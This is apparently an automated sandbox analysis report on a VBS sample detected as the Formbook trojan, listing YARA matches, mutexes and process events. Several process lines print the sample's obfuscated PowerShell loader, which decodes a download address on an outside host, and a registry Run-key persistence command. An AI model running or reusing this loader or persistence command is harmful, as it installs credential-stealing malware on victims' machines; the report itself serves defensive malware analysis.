        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039AEE2622_2_039AEE26
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F0E5922_2_038F0E59
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03908DBF22_2_03908DBF
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_0390FDC022_2_0390FDC0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038EADE022_2_038EADE0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038FAD0022_2_038FAD00
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039A1D5A22_2_039A1D5A
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F3D4022_2_038F3D40
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039A7D7322_2_039A7D73
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03990CB522_2_03990CB5
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_039AFCF222_2_039AFCF2
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038E0CF222_2_038E0CF2
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_038F0C0022_2_038F0C00
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_03969C3222_2_03969C32
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_02F4127022_2_02F41270
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_02F3A6E022_2_02F3A6E0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_02F3A6DF22_2_02F3A6DF
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_02F3C66022_2_02F3C660
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_02F3C44022_2_02F3C440
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_02F3C43722_2_02F3C437
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_02F42DC022_2_02F42DC0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_02F59DC022_2_02F59DC0
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: 22_2_02F42DBE22_2_02F42DBE
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: String function: 038DB970 appears 268 times
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: String function: 03937E54 appears 96 times
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: String function: 0396F290 appears 105 times
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: String function: 03925130 appears 36 times
        Source: C:\Windows\SysWOW64\xcopy.exeCode function: String function: 0395EA12 appears 86 times
        Source: 01105751.vbsInitial sample: Strings found which are bigger than 50
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)"
        Source: amsi64_5692.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: amsi32_6096.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: 00000017.00000002.3568353158.0000000001500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000016.00000002.3568882333.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000011.00000002.3231394969.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000011.00000002.3306907165.0000000025560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000016.00000002.3568770287.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: Process Memory Space: powershell.exe PID: 5692, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@33/10@3/3
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Sagsgningerne.IntJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2436:120:WilError_03
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6444:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5856:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2268:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3776:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b4c0somd.z5j.ps1Jump to behavior
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\01105751.vbs"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5692
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6096
        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\01105751.vbs"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping google.com -n 1
        Source: C:\Windows\System32\PING.EXEProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping %.%.%.%
        Source: C:\Windows\System32\PING.EXEProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Retorsionshandlingenllustrationer = 1;$Elytrigerous='S';$Elytrigerous+='ubstrin';$Elytrigerous+='g';Function Programregningsfunktionens($Ridderne){$Retorsionshandlingennfraocular=$Ridderne.Length-$Retorsionshandlingenllustrationer;For($Retorsionshandlingen=5; $Retorsionshandlingen -lt $Retorsionshandlingennfraocular; $Retorsionshandlingen+=(6)){$Outsmokes+=$Ridderne.$Elytrigerous.Invoke( $Retorsionshandlingen, $Retorsionshandlingenllustrationer);}$Outsmokes;}function Gracy216($Begrendes){. ($Antediluvianske) ($Begrendes);}$Diskoskasteren=Programregningsfunktionens 's.perM L deoLandszAccomiTurbolBrystlSu.loa Inte/Linje5.ilfo.Brneb0B,ddi illi(MamelWKortsiExoranBowkndSp,dho.urvew,ndtrsFjase utotNmilepTb,een marga1San.u0Balli.Montr0H,rsk;.ykke BrakpWxanthi ,ervnReprs6trova4Filet;D,awc vidnxT,gue6Admin4Cotra;Insci Un btrTogstvEgipt:Inter1Riv l2For e1 daun. Gens0Sknde)Neutr Trak GRepudeGuldkc BelakTandloV.rde/ edb2Uheld0Sknhe1Elek.0Nell,0 ,rot1Un,en0Skibi1savne MordFautogiKo,merDe,inearom,fShipboHapaxxStork/Inten1Splas2Ds,es1 ilsk.Fylds0Capri ';$Sprayens=Programregningsfunktionens 'NondeU rubasVa neeBe,kir For -,geblAR.bbegholose Ta dn ParatPrivi ';$Reprogrammes=Programregningsfunktionens 'Stuf.hL.muctVersit SubspCosmo:etcif/Taksa/ Impl8Morph7Far,n.Bronz1Anal,2proc,1Ungl .unpol1Unper0F,nda5varmt. Gr,n5Roc,e4,sent/SeksaOOverrmMismamT.buleLandlsForcetmis,arAtropuDiscop,iske.AarsadUnsanesaanipBrodflDiameonamatySawai ';$Kretidseffekternes=Programregningsfunktionens 'Vejkr>Phisa ';$Antediluvianske=Programregningsfunktionens 'Etam.iRaadie saddxFasts ';$Gunlaying='Forraadnelig';Gracy216 (Programregningsfunktionens ' L urS AtikeSignatRecon- geneCPen,eo.endrnNovumtPrintelailanPorphtSt ir Peatw-AngloPObitaa elvetSymbohP,esh TrvemT,ough: ,aad\ Afv I Cerid.roldrCheskt UdpasFilerfMenneo C,lorsol,ceSuavenphaneiIndlenAabengSeepssUnche1Pre i9Wi,db7Super.RadiotNiveax t rrt Duod Evole-Un mmV selraMoraklPericuUnmoueAdvoc Melle$samstG estiu AppenRe,orl TeleaAnmrkySaponiImmunn BehvgAh.eh;Chabo ');Gracy216 (Programregningsfunktionens ' FramiHabi,fCacos larit( GrectV.stfe.olfisTalertRidge-OzonopJu iaaStoddtTabarhPigl, Pse THaand:Mosen\KomplI .oemd ilker tigetEperosKrig,f ColloPl.udr SubseMad lnNonmoiKromgnEnok g SaxosHaand1 Twir9Op oe7 Lov..Fedtst An txfarvet Rede) rtss{ Ka.me KropxFaksiiUdsket Sang} Un s; Gro, ');$Kvrne = Programregningsfunktionens 'NedraeUnconcUan.ghPet ooPaatn Munke%Kys.eaCasanpfy,depSixpedOver aGravit orema Ragl%Euboe\DevelS LovgaLaa,ngPlat sNematgBug.gn JalaiTegninOvercgArbe.eSl,knr Forsn p.ileafsvo. UnshISpirinM lartH ved .fsla&Neonr&Be.ri AdiabeTro ecUdganhSvovloeksp Trink$Ambol ';Gracy216 (Programregningsfunktionens 'Slide$SvmnigImperlAvn,soT aadb Rag,aPie alFordr: DemiVGoogoiQuittrShop k TrknsMycetofodbomHomemhDr sieEffemd De,isdawsst Bf eyOprikpBrancePatrunSongbs Thri=Nonam(Am.utcPillamSulted Stev Toksi/ ilhecRajah bed
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sagsgningerne.Int && echo $"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Retorsionshandlingenllustrationer = 1;$Elytrigerous='S';$Elytrigerous+='ubstrin';$Elytrigerous+='g';Function Programregningsfunktionens($Ridderne){$Retorsionshandlingennfraocular=$Ridderne.Length-$Retorsionshandlingenllustrationer;For($Retorsionshandlingen=5; $Retorsionshandlingen -lt $Retorsionshandlingennfraocular; $Retorsionshandlingen+=(6)){$Outsmokes+=$Ridderne.$Elytrigerous.Invoke( $Retorsionshandlingen, $Retorsionshandlingenllustrationer);}$Outsmokes;}function Gracy216($Begrendes){. ($Antediluvianske) ($Begrendes);}$Diskoskasteren=Programregningsfunktionens 's.perM L deoLandszAccomiTurbolBrystlSu.loa Inte/Linje5.ilfo.Brneb0B,ddi illi(MamelWKortsiExoranBowkndSp,dho.urvew,ndtrsFjase utotNmilepTb,een marga1San.u0Balli.Montr0H,rsk;.ykke BrakpWxanthi ,ervnReprs6trova4Filet;D,awc vidnxT,gue6Admin4Cotra;Insci Un btrTogstvEgipt:Inter1Riv l2For e1 daun. Gens0Sknde)Neutr Trak GRepudeGuldkc BelakTandloV.rde/ edb2Uheld0Sknhe1Elek.0Nell,0 ,rot1Un,en0Skibi1savne MordFautogiKo,merDe,inearom,fShipboHapaxxStork/Inten1Splas2Ds,es1 ilsk.Fylds0Capri ';$Sprayens=Programregningsfunktionens 'NondeU rubasVa neeBe,kir For -,geblAR.bbegholose Ta dn ParatPrivi ';$Reprogrammes=Programregningsfunktionens 'Stuf.hL.muctVersit SubspCosmo:etcif/Taksa/ Impl8Morph7Far,n.Bronz1Anal,2proc,1Ungl .unpol1Unper0F,nda5varmt. Gr,n5Roc,e4,sent/SeksaOOverrmMismamT.buleLandlsForcetmis,arAtropuDiscop,iske.AarsadUnsanesaanipBrodflDiameonamatySawai ';$Kretidseffekternes=Programregningsfunktionens 'Vejkr>Phisa ';$Antediluvianske=Programregningsfunktionens 'Etam.iRaadie saddxFasts ';$Gunlaying='Forraadnelig';Gracy216 (Programregningsfunktionens ' L urS AtikeSignatRecon- geneCPen,eo.endrnNovumtPrintelailanPorphtSt ir Peatw-AngloPObitaa elvetSymbohP,esh TrvemT,ough: ,aad\ Afv I Cerid.roldrCheskt UdpasFilerfMenneo C,lorsol,ceSuavenphaneiIndlenAabengSeepssUnche1Pre i9Wi,db7Super.RadiotNiveax t rrt Duod Evole-Un mmV selraMoraklPericuUnmoueAdvoc Melle$samstG estiu AppenRe,orl TeleaAnmrkySaponiImmunn BehvgAh.eh;Chabo ');Gracy216 (Programregningsfunktionens ' FramiHabi,fCacos larit( GrectV.stfe.olfisTalertRidge-OzonopJu iaaStoddtTabarhPigl, Pse THaand:Mosen\KomplI .oemd ilker tigetEperosKrig,f ColloPl.udr SubseMad lnNonmoiKromgnEnok g SaxosHaand1 Twir9Op oe7 Lov..Fedtst An txfarvet Rede) rtss{ Ka.me KropxFaksiiUdsket Sang} Un s; Gro, ');$Kvrne = Programregningsfunktionens 'NedraeUnconcUan.ghPet ooPaatn Munke%Kys.eaCasanpfy,depSixpedOver aGravit orema Ragl%Euboe\DevelS LovgaLaa,ngPlat sNematgBug.gn JalaiTegninOvercgArbe.eSl,knr Forsn p.ileafsvo. UnshISpirinM lartH ved .fsla&Neonr&Be.ri AdiabeTro ecUdganhSvovloeksp Trink$Ambol ';Gracy216 (Programregningsfunktionens 'Slide$SvmnigImperlAvn,soT aadb Rag,aPie alFordr: DemiVGoogoiQuittrShop k TrknsMycetofodbomHomemhDr sieEffemd De,isdawsst Bf eyOprikpBrancePatrunSongbs Thri=Nonam(Am.utcPillamSulted Stev Toksi/ ilhecRajah bed
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sagsgningerne.Int && echo $"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)"
        Source: C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exeProcess created: C:\Windows\SysWOW64\xcopy.exe "C:\Windows\SysWOW64\xcopy.exe"
        Source: unknownProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
        Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
        Source: C:\Windows\SysWOW64\xcopy.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: unknownProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping google.com -n 1Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping %.%.%.%Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dirJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Retorsionshandlingenllustrationer = 1;$Elytrigerous='S';$Elytrigerous+='ubstrin';$Elytrigerous+='g';Function Programregningsfunktionens($Ridderne){$Retorsionshandlingennfraocular=$Ridderne.Length-$Retorsionshandlingenllustrationer;For($Retorsionshandlingen=5; $Retorsionshandlingen -lt $Retorsionshandlingennfraocular; $Retorsionshandlingen+=(6)){$Outsmokes+=$Ridderne.$Elytrigerous.Invoke( $Retorsionshandlingen, $Retorsionshandlingenllustrationer);}$Outsmokes;}function Gracy216($Begrendes){. ($Antediluvianske) ($Begrendes);}$Diskoskasteren=Programregningsfunktionens 's.perM L deoLandszAccomiTurbolBrystlSu.loa Inte/Linje5.ilfo.Brneb0B,ddi illi(MamelWKortsiExoranBowkndSp,dho.urvew,ndtrsFjase utotNmilepTb,een marga1San.u0Balli.Montr0H,rsk;.ykke BrakpWxanthi ,ervnReprs6trova4Filet;D,awc vidnxT,gue6Admin4Cotra;Insci Un btrTogstvEgipt:Inter1Riv l2For e1 daun. Gens0Sknde)Neutr Trak GRepudeGuldkc BelakTandloV.rde/ edb2Uheld0Sknhe1Elek.0Nell,0 ,rot1Un,en0Skibi1savne MordFautogiKo,merDe,inearom,fShipboHapaxxStork/Inten1Splas2Ds,es1 ilsk.Fylds0Capri ';$Sprayens=Programregningsfunktionens 'NondeU rubasVa neeBe,kir For -,geblAR.bbegholose Ta dn ParatPrivi ';$Reprogrammes=Programregningsfunktionens 'Stuf.hL.muctVersit SubspCosmo:etcif/Taksa/ Impl8Morph7Far,n.Bronz1Anal,2proc,1Ungl .unpol1Unper0F,nda5varmt. Gr,n5Roc,e4,sent/SeksaOOverrmMismamT.buleLandlsForcetmis,arAtropuDiscop,iske.AarsadUnsanesaanipBrodflDiameonamatySawai ';$Kretidseffekternes=Programregningsfunktionens 'Vejkr>Phisa ';$Antediluvianske=Programregningsfunktionens 'Etam.iRaadie saddxFasts ';$Gunlaying='Forraadnelig';Gracy216 (Programregningsfunktionens ' L urS AtikeSignatRecon- geneCPen,eo.endrnNovumtPrintelailanPorphtSt ir Peatw-AngloPObitaa elvetSymbohP,esh TrvemT,ough: ,aad\ Afv I Cerid.roldrCheskt UdpasFilerfMenneo C,lorsol,ceSuavenphaneiIndlenAabengSeepssUnche1Pre i9Wi,db7Super.RadiotNiveax t rrt Duod Evole-Un mmV selraMoraklPericuUnmoueAdvoc Melle$samstG estiu AppenRe,orl TeleaAnmrkySaponiImmunn BehvgAh.eh;Chabo ');Gracy216 (Programregningsfunktionens ' FramiHabi,fCacos larit( GrectV.stfe.olfisTalertRidge-OzonopJu iaaStoddtTabarhPigl, Pse THaand:Mosen\KomplI .oemd ilker tigetEperosKrig,f ColloPl.udr SubseMad lnNonmoiKromgnEnok g SaxosHaand1 Twir9Op oe7 Lov..Fedtst An txfarvet Rede) rtss{ Ka.me KropxFaksiiUdsket Sang} Un s; Gro, ');$Kvrne = Programregningsfunktionens 'NedraeUnconcUan.ghPet ooPaatn Munke%Kys.eaCasanpfy,depSixpedOver aGravit orema Ragl%Euboe\DevelS LovgaLaa,ngPlat sNematgBug.gn JalaiTegninOvercgArbe.eSl,knr Forsn p.ileafsvo. UnshISpirinM lartH ved .fsla&Neonr&Be.ri AdiabeTro ecUdganhSvovloeksp Trink$Ambol ';Gracy216 (Programregningsfunktionens 'Slide$SvmnigImperlAvn,soT aadb Rag,aPie alFordr: DemiVGoogoiQuittrShop k TrknsMycetofodbomHomemhDr sieEffemd De,isdawsst Bf eyOprikpBrancePatrunSongbs Thri=Nonam(Am.utcPillamSulted Stev Toksi/ ilhecRajah bed Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sagsgningerne.Int && echo $"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Retorsionshandlingenllustrationer = 1;$Elytrigerous='S';$Elytrigerous+='ubstrin';$Elytrigerous+='g';Function Programregningsfunktionens($Ridderne){$Retorsionshandlingennfraocular=$Ridderne.Length-$Retorsionshandlingenllustrationer;For($Retorsionshandlingen=5; $Retorsionshandlingen -lt $Retorsionshandlingennfraocular; $Retorsionshandlingen+=(6)){$Outsmokes+=$Ridderne.$Elytrigerous.Invoke( $Retorsionshandlingen, $Retorsionshandlingenllustrationer);}$Outsmokes;}function Gracy216($Begrendes){. ($Antediluvianske) ($Begrendes);}$Diskoskasteren=Programregningsfunktionens 's.perM L deoLandszAccomiTurbolBrystlSu.loa Inte/Linje5.ilfo.Brneb0B,ddi illi(MamelWKortsiExoranBowkndSp,dho.urvew,ndtrsFjase utotNmilepTb,een marga1San.u0Balli.Montr0H,rsk;.ykke BrakpWxanthi ,ervnReprs6trova4Filet;D,awc vidnxT,gue6Admin4Cotra;Insci Un btrTogstvEgipt:Inter1Riv l2For e1 daun. Gens0Sknde)Neutr Trak GRepudeGuldkc BelakTandloV.rde/ edb2Uheld0Sknhe1Elek.0Nell,0 ,rot1Un,en0Skibi1savne MordFautogiKo,merDe,inearom,fShipboHapaxxStork/Inten1Splas2Ds,es1 ilsk.Fylds0Capri ';$Sprayens=Programregningsfunktionens 'NondeU rubasVa neeBe,kir For -,geblAR.bbegholose Ta dn ParatPrivi ';$Reprogrammes=Programregningsfunktionens 'Stuf.hL.muctVersit SubspCosmo:etcif/Taksa/ Impl8Morph7Far,n.Bronz1Anal,2proc,1Ungl .unpol1Unper0F,nda5varmt. Gr,n5Roc,e4,sent/SeksaOOverrmMismamT.buleLandlsForcetmis,arAtropuDiscop,iske.AarsadUnsanesaanipBrodflDiameonamatySawai ';$Kretidseffekternes=Programregningsfunktionens 'Vejkr>Phisa ';$Antediluvianske=Programregningsfunktionens 'Etam.iRaadie saddxFasts ';$Gunlaying='Forraadnelig';Gracy216 (Programregningsfunktionens ' L urS AtikeSignatRecon- geneCPen,eo.endrnNovumtPrintelailanPorphtSt ir Peatw-AngloPObitaa elvetSymbohP,esh TrvemT,ough: ,aad\ Afv I Cerid.roldrCheskt UdpasFilerfMenneo C,lorsol,ceSuavenphaneiIndlenAabengSeepssUnche1Pre i9Wi,db7Super.RadiotNiveax t rrt Duod Evole-Un mmV selraMoraklPericuUnmoueAdvoc Melle$samstG estiu AppenRe,orl TeleaAnmrkySaponiImmunn BehvgAh.eh;Chabo ');Gracy216 (Programregningsfunktionens ' FramiHabi,fCacos larit( GrectV.stfe.olfisTalertRidge-OzonopJu iaaStoddtTabarhPigl, Pse THaand:Mosen\KomplI .oemd ilker tigetEperosKrig,f ColloPl.udr SubseMad lnNonmoiKromgnEnok g SaxosHaand1 Twir9Op oe7 Lov..Fedtst An txfarvet Rede) rtss{ Ka.me KropxFaksiiUdsket Sang} Un s; Gro, ');$Kvrne = Programregningsfunktionens 'NedraeUnconcUan.ghPet ooPaatn Munke%Kys.eaCasanpfy,depSixpedOver aGravit orema Ragl%Euboe\DevelS LovgaLaa,ngPlat sNematgBug.gn JalaiTegninOvercgArbe.eSl,knr Forsn p.ileafsvo. UnshISpirinM lartH ved .fsla&Neonr&Be.ri AdiabeTro ecUdganhSvovloeksp Trink$Ambol ';Gracy216 (Programregningsfunktionens 'Slide$SvmnigImperlAvn,soT aadb Rag,aPie alFordr: DemiVGoogoiQuittrShop k TrknsMycetofodbomHomemhDr sieEffemd De,isdawsst Bf eyOprikpBrancePatrunSongbs Thri=Nonam(Am.utcPillamSulted Stev Toksi/ ilhecRajah bed Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sagsgningerne.Int && echo $"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
